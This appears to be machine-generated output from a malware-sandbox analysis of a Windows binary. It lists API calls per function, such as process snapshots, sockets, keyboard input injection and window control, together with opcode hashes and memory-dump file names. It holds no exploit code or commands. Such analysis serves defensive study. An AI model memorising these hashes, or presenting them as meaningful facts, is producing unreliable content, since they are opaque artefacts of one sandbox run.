                                                                                                                                                                                          • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 314563124-0
                                                                                                                                                                                          • Opcode ID: 694fa703ebec1dafc5f150077a948ee54eb4cc356f522de198885e6cb1759eb0
                                                                                                                                                                                          • Instruction ID: 977e831cf11f17b6678f3ece5025e02f29efbede49eebe9a136c16307703643b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 694fa703ebec1dafc5f150077a948ee54eb4cc356f522de198885e6cb1759eb0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 27811B71A10109EFCF14DF94C988EEEB7BAFF89315F204558E506AB250DB75AE05CBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 007BB10C
                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 007BB11A
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 007BB1FC
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 007BB20B
                                                                                                                                                                                            • Part of subcall function 0074E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00774D73,?), ref: 0074E395
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1991900642-0
                                                                                                                                                                                          • Opcode ID: 547bfdce037f13c4131d39c00f3279ff67bfe0d79705afebc209d14a4c970575
                                                                                                                                                                                          • Instruction ID: 69df7b4a5f91c089b474717987d492f448f92f414c7df8d09382ee793f101a76
                                                                                                                                                                                          • Opcode Fuzzy Hash: 547bfdce037f13c4131d39c00f3279ff67bfe0d79705afebc209d14a4c970575
                                                                                                                                                                                          • Instruction Fuzzy Hash: FC513EB1508304EFD310EF24C88AA9BBBE8FF88754F40492DF98597252DB78D904CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                          • Opcode ID: a0a4702c448c4e99b9a413b0e1740e0c342976139482724d99f435b06b6f2b31
                                                                                                                                                                                          • Instruction ID: 81ed2265b9d3c6ac3fdf4543670bd6cab1e016ea8030a8a26d96fe3030315f9d
                                                                                                                                                                                          • Opcode Fuzzy Hash: a0a4702c448c4e99b9a413b0e1740e0c342976139482724d99f435b06b6f2b31
                                                                                                                                                                                          • Instruction Fuzzy Hash: 70411831A00100EBDF257EBDCC8AABE3AA9EF417B0F548625FC1DD7191DA7D484197A2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 007B255A
                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 007B2568
                                                                                                                                                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 007B25E7
                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 007B25F1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$socket
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1881357543-0
                                                                                                                                                                                          • Opcode ID: a0563cc6c669dee095c6ffee93cc6c4edc852eb8a5d56c11b1c97e836f28c913
                                                                                                                                                                                          • Instruction ID: a64f0381b75966c75bdef828d9c20a5dcd51818043d8c897520fe73963b22599
                                                                                                                                                                                          • Opcode Fuzzy Hash: a0563cc6c669dee095c6ffee93cc6c4edc852eb8a5d56c11b1c97e836f28c913
                                                                                                                                                                                          • Instruction Fuzzy Hash: F341B174A00200AFE720AF24C88AF6677E5AF04758F54C49CF9158F6D3D779ED428B91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 007C6D1A
                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 007C6D4D
                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 007C6DBA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3880355969-0
                                                                                                                                                                                          • Opcode ID: 3cc633e01927df22a931ea22a97bb10a5127adc0fe63cf9eb02e5402acf9c259
                                                                                                                                                                                          • Instruction ID: 8ad15e55bc78516c1d7be33b1aaeebef11a5cbe161825dd43262fcec388df118
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3cc633e01927df22a931ea22a97bb10a5127adc0fe63cf9eb02e5402acf9c259
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7551F774A00209EFCF24DF68D884EAE7BB6FB44360F20856EE9159B290D774AD81CB50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 287231299e0e8a6b76d03b31dadd4990ba046031a9eda503371f4b83910e5fea
                                                                                                                                                                                          • Instruction ID: 2fd605177afc810f8f029eb947d6108a602a1b56c4374a3a2704667316130d9d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 287231299e0e8a6b76d03b31dadd4990ba046031a9eda503371f4b83910e5fea
                                                                                                                                                                                          • Instruction Fuzzy Hash: 29414B71A00705EFD725AF78CC45BAA7BEDEB85710F10853AF916DB282D379994187C0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007A61C8
                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 007A61EE
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007A6213
                                                                                                                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007A623F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3321077145-0
                                                                                                                                                                                          • Opcode ID: eadb35d241849143de945ecef77230f89bebc177ef054c8352e50f09cf59c166
                                                                                                                                                                                          • Instruction ID: f22711d27c0e062b4770715f4596bf207a412a958a0e81f0719d7c2f437c2d4c
                                                                                                                                                                                          • Opcode Fuzzy Hash: eadb35d241849143de945ecef77230f89bebc177ef054c8352e50f09cf59c166
                                                                                                                                                                                          • Instruction Fuzzy Hash: DE411C35600610DFDB21DF15C549A59BBF2FF89714F198498E94AAB3A2CB38FD01CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000000,007570E1,00000000,00000000,00758649,?,00758649,?,00000001,007570E1,00000000,00000001,00758649,00758649), ref: 0076DC90
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0076DD19
                                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0076DD2B
                                                                                                                                                                                          • __freea.LIBCMT ref: 0076DD34
                                                                                                                                                                                            • Part of subcall function 00763B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00756A79,?,0000015D,?,?,?,?,007585B0,000000FF,00000000,?,?), ref: 00763BC5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2652629310-0
                                                                                                                                                                                          • Opcode ID: e929d15ae0d11df5a9a36b8952136d919f905d6164360a6e9f4d8a146f41f4c9
                                                                                                                                                                                          • Instruction ID: 5c293d5a9f6a8325a302a78c03b11c8ad85fd6bb2464c795609b679871edf9de
                                                                                                                                                                                          • Opcode Fuzzy Hash: e929d15ae0d11df5a9a36b8952136d919f905d6164360a6e9f4d8a146f41f4c9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 82319C72B1020AABDF349F64DC45EEE7BA5EF41310B194129FC0696190EB79CD55CBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0079B473
                                                                                                                                                                                          • SetKeyboardState.USER32(00000080), ref: 0079B48F
                                                                                                                                                                                          • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0079B4FD
                                                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0079B54F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 432972143-0
                                                                                                                                                                                          • Opcode ID: f105950b9fac4665fb739a04f66bcd9691edf2b6f6e36303b48c6c98297348c3
                                                                                                                                                                                          • Instruction ID: cb272d1cf62fd89c3f13e823d449f6c3ea7c8d0e938260b642a659a3907cd35a
                                                                                                                                                                                          • Opcode Fuzzy Hash: f105950b9fac4665fb739a04f66bcd9691edf2b6f6e36303b48c6c98297348c3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 21316B70A00248AEFF30CB65B949BFA7BB5AB44310F04821AF096961E2C37C8D519795
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 007C5DF0
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 007C5E13
                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007C5E20
                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007C5E46
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3340791633-0
                                                                                                                                                                                          • Opcode ID: 44c47ffb36fe72a81dbf5f71f86c455f7a4d1216adb595a4229c57f6eab60576
                                                                                                                                                                                          • Instruction ID: a2ee2298b22c04dc9786ed373a570f5bb5706e38e4f78d539c6ce21903a00a8d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 44c47ffb36fe72a81dbf5f71f86c455f7a4d1216adb595a4229c57f6eab60576
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D318F34B51B08AFEB349E14CC49FE93761AB05350F18411EF6129A2E1C77EBAC0DB41
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0079B5B8
                                                                                                                                                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 0079B5D4
                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 0079B63B
                                                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0079B68D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 432972143-0
                                                                                                                                                                                          • Opcode ID: 1d5e2c43665b77fdfa5d0f76d45ec8115e4f2e5a548dacf3bfb9336440343446
                                                                                                                                                                                          • Instruction ID: 9782c00281efcb69d30709033a3184d4085db9505dc88bcb2a367a1f767a4aa3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d5e2c43665b77fdfa5d0f76d45ec8115e4f2e5a548dacf3bfb9336440343446
                                                                                                                                                                                          • Instruction Fuzzy Hash: A9313C30940608AEFF308B65B909BFA7BB6AF85310F04822EE481961D1C37CAE55CB95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ClientToScreen.USER32(?,?), ref: 007C80D4
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 007C814A
                                                                                                                                                                                          • PtInRect.USER32(?,?,?), ref: 007C815A
                                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 007C81C6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1352109105-0
                                                                                                                                                                                          • Opcode ID: 811e67c22c03fd3b70f6d5cb75c17c8072343a26b716faaefe281eca989b611d
                                                                                                                                                                                          • Instruction ID: 373b35b5886ce86af6468dff60233a5542b2568b146102b256097415a952213c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 811e67c22c03fd3b70f6d5cb75c17c8072343a26b716faaefe281eca989b611d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 82418230601219DFCB91CF58C884FA9BBF5FF45314F1841ACE9559B261CB79E842CB51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 007C2187
                                                                                                                                                                                            • Part of subcall function 00794393: GetWindowThreadProcessId.USER32(?,00000000), ref: 007943AD
                                                                                                                                                                                            • Part of subcall function 00794393: GetCurrentThreadId.KERNEL32 ref: 007943B4
                                                                                                                                                                                            • Part of subcall function 00794393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00792F00), ref: 007943BB
                                                                                                                                                                                          • GetCaretPos.USER32(?), ref: 007C219B
                                                                                                                                                                                          • ClientToScreen.USER32(00000000,?), ref: 007C21E8
                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 007C21EE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2759813231-0
                                                                                                                                                                                          • Opcode ID: 0f60913e7208ba3af90ee4475a692e5684d6a248a37ea6c8361c9ed45a541970
                                                                                                                                                                                          • Instruction ID: d97245a6a2b518a46723b0de75969c9a50fcfeb722f4416e3dbc2e7d95343a3b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f60913e7208ba3af90ee4475a692e5684d6a248a37ea6c8361c9ed45a541970
                                                                                                                                                                                          • Instruction Fuzzy Hash: 193141B1D00209EFDB04DFA5C885DAEB7F8EF48304B54846EE415E7252D7759E45CBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 007341EA: _wcslen.LIBCMT ref: 007341EF
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0079E8E2
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0079E8F9
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0079E924
                                                                                                                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0079E92F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3763101759-0
                                                                                                                                                                                          • Opcode ID: 30ba5958b46defb1a7db29593e9280495976ac484a8a34978401f1f446011929
                                                                                                                                                                                          • Instruction ID: 50d7fb20671fb746e6e495ae28c7b6888341740bcffb08e28af8723e7f777738
                                                                                                                                                                                          • Opcode Fuzzy Hash: 30ba5958b46defb1a7db29593e9280495976ac484a8a34978401f1f446011929
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B21A671900218EFDF10EFA8D985BEEB7B8EF55361F144064E804BB241D678AE4187A2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073249F: GetWindowLongW.USER32(00000000,000000EB), ref: 007324B0
                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 007C9A5D
                                                                                                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007C9A72
                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 007C9ABA
                                                                                                                                                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 007C9AF0
                                                                                                                                                                                          Memory Dump Source
